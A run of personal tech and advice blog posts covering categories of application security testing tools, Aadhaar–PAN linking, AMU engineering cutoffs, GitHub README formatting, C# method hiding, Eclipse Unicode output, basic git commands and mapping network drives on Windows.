Different Application Security Testing Tools: Major Classification

 Static Application Security Testing (SAST)

SAST tools can be thought of as white-hat or white-box testing, where the tester knows information about the system or software being tested, including an architecture diagram, access to source code, etc. SAST tools examine source code (at rest) to detect and report weaknesses that can lead to security vulnerabilities.

Source-code analyzers can run on non-compiled code to check for defects such as numerical errors, input validation, race conditions, path traversals, pointers and references, and more. Binary and byte-code analyzers do the same on built and compiled code. Some tools run on source code only, some on compiled code only, and some on both.

Dynamic Application Security Testing (DAST)

In contrast to SAST tools, DAST tools can be thought of as black-hat or black-box testing, where the tester has no prior knowledge of the system. They detect conditions that indicate a security vulnerability in an application in its running state. DAST tools run on operating code to detect issues with interfaces, requests, responses, scripting (i.e. JavaScript), data injection, sessions, authentication, and more.

DAST tools employ fuzzing too: throwing known invalid and unexpected test cases at an application, often in large volume.

Origin Analysis/Software Composition Analysis (SCA)

Software-governance processes that depend on manual inspection are prone to failure. SCA tools examine software to determine the origins of all components and libraries within the software. These tools are highly effective at identifying and finding vulnerabilities in common and popular components, particularly open-source components. They do not, however, detect vulnerabilities for in-house custom developed components.

SCA tools are most effective in finding common and popular libraries and components, particularly open-source pieces. They work by comparing known modules found in code to a list of known vulnerabilities. The SCA tools find components that have known and documented vulnerabilities and will often advise if components are out of date or have patches available.

Database Security Scanning

The SQL Slammer worm of 2003 exploited a known vulnerability in a database-management system that had a patch released more than one year before the attack. Although databases are not always considered part of an application, application developers often rely heavily on the database, and applications can often heavily affect databases. Database-security-scanning tools check for updated patches and versions, weak passwords, configuration errors, access control list (ACL) issues, and more. Some tools can mine logs looking for irregular patterns or actions, such as excessive administrative actions.

Interactive Application Security Testing (IAST) and Hybrid Tools

Hybrid approaches have been available for a long time, but more recently have been categorized and discussed using the term IAST. IAST tools use a combination of static and dynamic analysis techniques. They can test whether known vulnerabilities in code are actually exploitable in the running application.

IAST tools use knowledge of application flow and data flow to create advanced attack scenarios and use dynamic analysis results recursively: as a dynamic scan is being performed, the tool will learn things about the application based on how it responds to test cases. 

Mobile Application Security Testing (MAST)

MAST Tools are a blend of static, dynamic, and forensics analysis. They perform some of the same functions as traditional static and dynamic analyzers but enable mobile code to be run through many of those analyzers as well. MAST tools have specialized features that focus on issues specific to mobile applications, such as jail-breaking or rooting of the device, spoofed WI-FI connections, handling and validation of certificates, prevention of data leakage, and more.

Application Security Testing as a Service (ASTaaS)

As the name suggests, with ASTaaS, you pay someone to perform security testing on your application. The service will usually be a combination of static and dynamic analysis, penetration testing, testing of application programming interfaces (APIs), risk assessments, and more. ASTaaS can be used on traditional applications, especially mobile and web apps.

Momentum for the use of ASTaaS is coming from use of cloud applications, where resources for testing are easier to marshal.

Correlation Tools

Dealing with false positives is a big issue in application security testing. Correlation tools can help reduce some of the noise by providing a central repository for findings from others AST tools.

Different AST tools will have different findings, so correlation tools correlate and analyze results from different AST tools and help with validation and prioritization of findings, including remediation workflows. Whereas some correlation tools include code scanners, they are useful mainly for importing findings from other tools.

Test-Coverage Analyzers

Test-coverage analyzers measure how much of the total program code has been analyzed. The results can be presented in terms of statement coverage (percentage of lines of code tested) or branch coverage (percentage of available paths tested).

For large applications, acceptable levels of coverage can be determined in advance and then compared to the results produced by test-coverage analyzers to accelerate the testing-and-release process. These tools can also detect if particular lines of code or branches of logic are not actually able to be reached during program execution, which is inefficient and a potential security concern. Some SAST tools incorporate this functionality into their products, but standalone products also exist.

Application Security Testing Orchestration (ASTO)

While the term ASTO is newly coined by Gartner since this is an emerging field, there are tools that have been doing ASTO already, mainly those created by correlation-tool vendors. The idea of ASTO is to have central, coordinated management and reporting of all the different AST tools running in an ecosystem. It is still too early to know if the term and product lines will endure, but as automated testing becomes more ubiquitous, ASTO does fill a need.

Selecting Testing Tool Types

There are many factors to consider when selecting from among these different types of AST tools. If you are wondering how to begin, the biggest decision you will make is to get started by beginning using the tools. According to a 2013 Microsoft security study, 76 percent of U.S. developers use no secure application-program process and more than 40 percent of software developers globally said that security wasn't a top priority for them. Our strongest recommendation is that you exclude yourself from these percentages.

There are factors that will help you to decide which type of AST tools to use and to determine which products within an AST tool class to use. It is important to note, however, that no single tool will solve all problems. As stated above, security is not binary; the goal is to reduce risk and exposure.

Network Security Tools

Though they are not directly the part of Application Security domain, however without these fully implemented and running the application shall be prone to more and more risks. There is a separate post for list or types of network security tools.

Link Aadhaar and PAN card : Income Tax India New Rule demystified at W3LC.com

Now that it is official that you need to link your Aadhar and PAN card details, the obvious question is how to do it. This post will explain that. But before that i will like to explain some points.


The Honourable Supreme Court in its landmark judgement has upheld Section 139AA of the Income Tax Act as constitutionally valid which required quoting of the Aadhaar number in applying for PAN as well as for filing of income tax returns. The Income Tax India official website shows this message clearly as on 14/06/2017. CBDT has extended the due date of furnishing Statement of Financial Transactions for AY 2017-18 from 31st May 2017 to 30th June 2017. https://incometaxindiaefiling.gov.in/

Method 1: Online Portal To link your Aadhaar with PAN:

* Go to the income tax e-filing website https://incometaxindiaefiling.gov.in/
* Click on the tab ‘Link Aadhaar’ on the left-hand side of the website. (See above screenshot)
* This will automatically lead you to https://incometaxindiaefiling.gov.in/e-Filing/Services/LinkAadhaarHome.html
* Fill your PAN and Aadhaar number
* Then enter your name exactly as mentioned in Aadhaar and then submit it.
* Enter captcha and click on 'Link Aadhaar'.
* After verification of details from the Unique Identification Authority of India (UIDAI), the linking will be confirmed.
* You will also get email at your registered email Id.
* In case, your linking was already done earlier, it will tell you that its already linked.


Method 2: SMS Method to Link you Aadhar and PAN card

For this you have to keep ready following information:
1. Your registered phone number with Adhar card
2. Your Aadhaar Number
3. Your PAN number

You need to send an SMS in a required format to given number by the government of India.

SMS format to link Aadhaar with PAN:
Send SMS to 567678 or 56161 from your registered mobile number in following format:
UIDPAN<12 aadhaar="" digit=""><10 digit="" pan="">

Example:
UIDPAN 123456789000 ABCDE1234M


Article on Hindustan Times
Guide on Business Standard Website
https://cleartax.in/s/how-to-link-aadhaar-to-pan
BankBazaar Notes

AMU Engineering cut off explained : Demystifying questions like Can I get admission in the Aligarh Muslim University BTech with a score of 72?

This article will explain you every bits of AMU Engineering cutoff and waiting lists.

To start with, a simple answer to what is the cutoff for the engineering entrance examination - Fluctuating!

Many of the young students often ask questions like: Can I get admission in the AMU BTech with a score of 72? My reply to all of them would be - You are just on margin and nothing can be predicted surely at this score!

Having said that, I congratulate them on the efforts they put in. They surely are among good students who have the mettle to get admitted to this prestigious university. To anyone with this high score, you now have 3 options:

1. Wait and watch for the results to come. I wish you all the best and once selected respond here with the good message.
2. Hold tight! You might also get included in Waiting lists. There might be 3 waiting lists in themselves. You can get admission if people drop off and do not take admissions.
3. Start focusing on more exams and preparations should never loose focus waiting on the results on one exams. Exams are a part of life, and not the life itself!

It should be understood that the cutoff shall be based on some of the influential factors which affect the same to a great extent. Various aspects are taken into consideration while announcing the AMUEEE 2017 Cutoff Marks. It varies highly with the difficulty level of question paper and other factors. Generally,  for moderate level of difficulty , it is around 70-75 for external students and around 60-65 for internal students.



The total number of seats are around 365 and number of seats in different trades are as follows:
Chemical Engineering - 30
Civil Engineering - 60
Computer engineering - 50
Electrical Engineering - 60
Electronics Engineering - 50
Mechanical engineering - 90
Petrochemical Engineering - 20
BArch - 20


The cutoff depends on how many well prepared candidates appeared for the exam that year, question paper and if you are internal or external. Some important factors that you can include in guessing the cutoff present year are listed as following:

• Total Number of students
• Availability of seats
• Toughness level of examination
• Lowest and average marks in the entrance examination
• Marking scheme
• Performance of the candidates
• Previous year cutoff trends

As per the official notifications:

AMU determines the minimum scores obtained by the candidates to be considered for admission to various engineering courses at the university. AMUEEE 2017 cutoff involves various important aspects. The vital aspects are given below.
For admission to various undergraduate engineering courses at AMU, the candidates have to either score the minimum required cutoff marks or above that.
AMU conducts AMUEEE 2017 and is the competent authority that decides AMUEEE 2017 cutoff marks.
AMUEEE cutoff 2017 is determined by various factors like candidates’ performance level, seat capacity of the respective courses, total number of test takers, and difficulty level of the paper and reservation policy.
Aspirants, who fail to secure the minimum marks required for admission to AMU through AMUEEE 2017, will not be considered eligible for admissions to B. Tech courses at the university.
On the basis of AMUEEE 2017 cutoff, AMU prepares AMUEEE 2017 merit list for the examinees.
As per their ranks in AMUEEE 2017 merit list, seats are allocated to candidates.

My three advises here:

1. Concentrate on your preparations and give your best shot. Don't prepare with a preset target score as it can deceive you into making a wrong decision at your test date. Think 95% plus!
2. Even if you don't get your favorite branch, you have a chance to change your branch in the beginning of your second year, provided you study well. I did that. You need to have very high scores in your first year results.
3. In case you get a waiting list, do not be disheartened. There is a good chance that it will get clear as many would cancel their admissions. 

I wish all the students a very best of luck in all the engineering entrance exams. You all are a gem and a treasure for the nation.

Jai Hind & Jai Ho!

Using Github ReadMe opened programatically : How to open and read the ReadMe.md file dynamically

It is noteworthy to understand that HTML does work in the ReadMe.md file. With this clear understanding, I guess many of such questions would be automatically answered like - how to make bold font in ReadMe file, or how to insert image etc. Also note that it depends a lot on what application/ text editor you are using and also lot on the OS. 

Recently I had trouble in inserting blank line character in the Readme.md file of Github. I personally preferred < br /> tag there, and i have a full post describing the same: http://www.w3lc.com/2017/05/new-line-in-readme-file-github-fixing.html.

I have demonstrated the change in a git commit in the Github repository explained in the post. See: https://github.com/Anwar-Faiz/Simple-Java-Unicode/commit/85bd54531067ff4055c5e8801aba5324221d5ae3

This understanding was much needed to handle the question and also to find many other uses of why you would probably need to do it!

Further, to answer the question straight, you need two steps: 

1. Find the Url for the ReadMe.md file in Raw version. For example see one: https://raw.githubusercontent.com/Anwar-Faiz/forkrap/master/README.md 

How to open Raw view of ReadMe.md file: ( See screenshot )

2. Now if you want to use server side the using file_gets_content etc of php you can load the url. Or, if you want to use jquery, you can use the Load().

** Do, also notice that if you do View Source of the Raw URL page, you just see, plain text. So, you don't need to do much text parsing stuffs as well :) This is a good news.

** Next you can use unescape functions or tools like codebeautify to unescape the characters that can alter with the look and feel of your HTML like ' <   " etc etc.

Using Github ReadMe opened programatically : How to open and read the ReadMe.md file dynamically: https://www.w3lc.com/2017/05/using-github-readme-opened.html

To create sophisticated formatting for your prose and code on GitHub with simple syntax, you can refer the basic writing and formatting syntax at: https://help.github.com/articles/basic-writing-and-formatting-syntax/

Have a great Day dear :)

@Anwar Jamal Faiz

New line in ReadMe file Github: Fixing the blank new line break issue in ReadMe.Md files in Github

This post is aimed to fix a very simple issue - Fixing the blank new line break issue in ReadMe.Md files in Github. You can find the ReadMe.Md file which had this problem and how it was fixed in my Github repository: https://github.com/Anwar-Faiz/Simple-Java-Unicode


When editing an issue and clicking Preview the following lines in Read me file:
a
b
c
i.e. it shows every letter on a new line.

However, it seems sometimes that after pushing similar markdown source structure in README.md joins all the letters on one line.

Issue: This usually happens because of different Operating systems and text editors used.


Solution:
Interpreting newlines as
used to be a feature of Github. But recent documentations do not list this as a feature. So, you have to do it manually. But its easy!

Method 1: Introduce a __ character at end of each line. _ acts as a blank space
i.e transform:
a
b
c
as following in the ReadMe.md file:
a__
b__
c
(where ).

Method 2: Explicitly add
tags.
Eg:
a
b
c


I personally prefer method 2 for a number of reasons. For example you can see following commit of mine just to fix the same issue:
https://github.com/Anwar-Faiz/Simple-Java-Unicode/commit/85bd54531067ff4055c5e8801aba5324221d5ae3


Using Github ReadMe opened programatically : How to open and read the ReadMe.md file dynamically: https://www.w3lc.com/2017/05/using-github-readme-opened.html

New line in ReadMe file Github: Fixing the blank new line break issue in ReadMe.Md files in Github
https://www.w3lc.com/2017/05/new-line-in-readme-file-github-fixing.html

To create sophisticated formatting for your prose and code on GitHub with simple syntax, you can refer the basic writing and formatting syntax at: https://help.github.com/articles/basic-writing-and-formatting-syntax/

Cheers ;)
Anwar Faiz

Method hiding Vs overriding in C# : New feature that can be cause of big troubles later

In here, I tried to show a new feature in C# or Visual studio languages. This is not in Java, and I have proactively tested that ;)

Example: Class A has a Print method; class B inherits from class A and implements the Print method as well. Now Print method will be overridden. Simple!

But now, test carefully that what happens if you change the Print method signature in class B. If you add the new keyword there, a behavior changes. In this case the method does not overrides. In fact it will hide the method. For references, i have the Github repository up and running: https://github.com/Anwar-Faiz/Method-Hiding-Demo

Most Important: In normal object calls, this one will not be caught. The behavior difference is seen when you make an object with parent class variable.


Let us start with defining some classes, and see a working example:

class A
    {
        public string Print()
        {
            return "A";
        }
    }

    class B : A
    {
        public string Print()
        {
            return "B";
        }
    }

    class A2
    {
        public string Print()
        {
            return "A2";
        }
    }

    class B2 : A2
    {
        public new string Print()
        {
            return "B2";
        }
    }

Now let us write a program to check the behavior in both ways. See attached screenshot:

The result of the run is as follows:


Demo of overriding...
 a.Getname : A
 b.Getname : B
 a2.Getname : A2
 b2.Getname : B2

Demo of method hiding...
 x.Getname : A
 y.Getname : A2



Now this clearly shows that in the second case, the method of child class becomes hidden!


Issues seen with this new feature in Visual Studio C#:
What I foresee here are a couple of problems and i am describing the same:
1. Programmers of other languages reading this part of code, will have a tough time understanding what is happening.
2. There is a huge difference between the way overriding works and this method hiding functionality behaves, this new feature may prove to be step going back to Non-OOP days!
3. More importantly, the function written in the child class, gets of no use now. It becomes hidden, in a way.
4. I further see that it is default behavior in C#. This means that you do not even need to write the new keyword. Also, if the method on the base class is marked as virtual, and you forget to mark the method on the inheriting class with override, you might land in method hiding.
5. If a bug is encountered, it will be hard to find that the trouble is cause of a new keyword.


Proposed solution to team Microsoft working on this:
As we know, since already introduced, it will be tough to remove it. Particularly, because many have already started using in their projects. I know the team Microsoft spends a lot of effort on giving backwards compatibilty, and they are really good at that!.So, the best option is to introduce the Warning on Visual Studio Editor. You can also raise a compile time warning.

PS: You can download working repository of code sample at:
https://github.com/Anwar-Faiz/Method-Hiding-Demo


Have a happy coding and testing guys!
@Anwar Faiz

Unicode characters in Eclipse console : Resolving Eclipse IDE issue when console runner not shows Unicode and Multibyte characters.

First of all little gyaan:

What is Unicode character string:
Earlier we used ASCII etc to encode characters. But the limit of the number of characters were less. Obviously, you cannot capture world in 256 numbers!
Then we developed some more encoding to cater to all languages but many of them had issues like below:
1. A particular code value corresponds to different letters in the various language standards.
2. The encodings for languages with large character sets have variable length. Some common characters are encoded as single bytes, other require two or more byte.

Here enters our beloved Unicode. Our hero, a new language standard was developed and in this character holds 2 byte. Hence, java or C++ or any language, uses 2 byte for characters representation.

lowest value:\u0000
highest value:\uFFFF


My problem statement in this post is that sometimes the unicode characters are not visible in the output console of Eclipse IDE. This blog post aims to solve that.

Suppose our program is:
public class Simple{
public static void main(String... args){
System.out.println("Hi World!");

String arabicText = "اسمي أنور";
String banglaText = "আমার নাম আনোয়ার";
String urduText = "میرا نام انور ہے";
String hindiText = "मेरा नाम अनवर है";
String frenchText = "Je m'appelle Anwar";

System.out.println(arabicText);
System.out.println(banglaText);
System.out.println(urduText);
System.out.println(hindiText);
System.out.println(frenchText);
}
}

On running the output is:
Hi World!
???? ????
???? ??? ???????
???? ??? ???? ??
???? ??? ???? ??
Je m'appelle Anwar

See screenshot:






To resolve this you need to Modify your Run Configuration:
To Open Your Run Configuration. This can be achiebved by:
In Package Explorer, right click on your project
Run As-> Run Configurations

Here In the common Tab, check the Encoding used:

Change it to UTF8.
Click apply and Run

Now Run the program and you should find correct result. New output is:

Hi World!

اسمي أنور

আমার নাম আনোয়ার

میرا نام انور ہے

मेरा नाम अनवर है

Je m'appelle Anwar

See screenshot:

You can download the repository having the sample code from Gitup. See: https://github.com/Anwar-Faiz/Simple-Java-Unicode

Fatal: bad Object error in Git cherry-pick - Why Exception is thrown during cherry picking in Git ? *

In one of my earlier blog post, I explained how to cherry-pick in Git. To understand more about what does cherry picking a commit in git mean and how to do it, refer:
W3LC: Git Cherry Pick Command Tutorial

This post is to deal a situation when you get a fatal error in your attempt to cherry pick. The error is as follows:
"fatal: bad object"

So here I would like to explain why this occurs. The cause is that there is no information about remote branch on your local system.

Technically, if the branch is not locally present - you don't have the right data. You will errors like " fatal: bad object "

Solution:
To solve this you first need to fetch information on your local system. To do this use fetch command of Git.

1. fetch just the one remote

git fetch

2. or fetch from all remotes

git fetch --all

Here we should take a short break and understand what is Git Fetch command:

W3LC Definition: In the simplest terms, git pull does a git fetch followed by a git merge.
This means that the fetch operation never changes any of your own local branches under refs/heads, and is safe to do without changing your working copy. A git pull is what you would do to bring a local branch up-to-date with its remote version, while also updating your other remote-tracking branches. This updating your other remote-tracking branches is called as fetch.

So, let us assume that you fetched the information about all branches.

Now, make sure you're back on the branch you want to cherry-pick to. And use the git cherry-pick command again. Example:
git cherry-pick 9505ac61c924de0bba404f40f8abdc53af1909d8

Great. Now it should work!


Do also read if you want to change the name of your git branch. The process to do so is explained fully on my earlier blog post:
W3LC: Git Rename a Branch Name

Git : Cherry-pick a commit in branch

Friends, it a very common situation that if you are in a new branch of your own but want to bring information or changes from another branch.

Sometimes you also land in a situation where you have been asked to cherry pick a commit. But you have no clue idea what it means! Trust me. That was the case with me when i heard this while I was in Symantec. The history is that we used Perforce for the version control, but a new team started using Git. And cherry picking was something that needed a beer to actually understand ;)

So what does cherry picking a commit in git mean? How do you do it?

Solution:
Cherry picking in git means to choose a commit from one branch and apply it onto another.
Note that it is different from merge and rebase which normally applies many commits onto a another branch.

Syntax:
git cherry-pick

Example:
First make sure you are on the branch you want apply the commit to. For instance suppose you have to bring changes in master itself:
git checkout master

Now Execute the following:
git cherry-pick
Eg: git cherry-pick 3d05ac6159e4de0bba404f40f8abdca3af1903d3


Voila!
You're done. Just check your branch for the new changes. The diff history will show you changes in that commit to enter in your branch as well.

CAUTION:
In case you get an error like:
fatal: bad object 02x661db5adf2anwarJamalFaizeacf09f048b8b11
It means that the branch information is not locally present. To solve this I have already written another post. Thank me for this ;)  http://www.w3lc.com/2017/03/fatal-bad-object-error-in-git-cherry.html


Note:
Do also read if you want to change the name of your git branch. The process to do so is explained fully on my earlier blog post:
W3LC: Rename Branch Name in Git

Git : Rename / Change Branch name : How to Change the branch name of a local or a remote branch in git

There are multiple scenarios if you want to change the name of the branch. Sometimes you could have named a branch incorrectly, and sometimes it could be because you didn't follow the naming guidelines as per your team and organisation. Whatever be the cause, you very well need to know the method to do so.


The process is as follows:

1. First, rename your local branch.  (Sometimes you need to only do this. For example if the branch is yet not pushed on stash.)
If you are on the branch you want to rename:
Syntax: git branch -m new-name


2. In case you are on a different branch:
Syntax: git branch -m old-name new-name


3. Now suppose you want o delete the old remote branch and push the new-name local branch.
Syntax: git push origin :old-name new-name


Or, 4. You can also reset the upstream branch with the new branch local branch.
For this you need to switch to your new local branch and then:
Syntax: git push origin -u new-name

CD with mapped mounted drive on network : CHDIR command

It has happened with me that I was able to succesfully mount a network drive and can freely access it using Windows file-system Explorer. But my script was not able to access it. Digging a step further, i noticed that I could not even CD to that drive on command prompt. Hence i finally wrote this blog post for anyone running into the similar issue.

Question : How do I change to a mapped network drive at the command line?

Issue:
Say, you have a networked drive mapped to "U:\"
Now you want to go to that drive from a command line.
However, when you try you get an error suggesting
C:>u: The system cannot find the drive specified.


Solution:
There are two aspects to the solution:
1. The Syntax to use CD command on Windows may be the cause. Remember that for changing directories you should use cd /d U: rather than just U:
2. You should first start using the map drive on command prompt. Command used to do that is as follows:
net use u:

See attached screenshot showing the error as well as what happened after solution.

C:\Users\mfaiz\Downloads>net use p:
Local name        p:
Remote name       \\sxa.xxx.xxx.com\ap-xxx
Resource type     Disk
The command completed successfully.